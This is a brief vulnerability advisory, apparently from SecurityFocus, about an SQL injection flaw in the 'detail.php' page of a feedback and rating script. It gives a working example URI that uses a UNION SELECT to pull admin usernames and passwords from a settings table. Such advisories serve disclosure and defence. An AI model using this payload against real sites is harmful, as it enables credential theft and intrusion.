Feedback and Rating Script 'detail.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/detail.php?listingid=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(0x757365726E616D653A20,username,0x70617373776F72643A,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/auto_admin_settings_tb/**/LIMIT0,1/*


 

Privacy Statement
Copyright 2010, SecurityFocus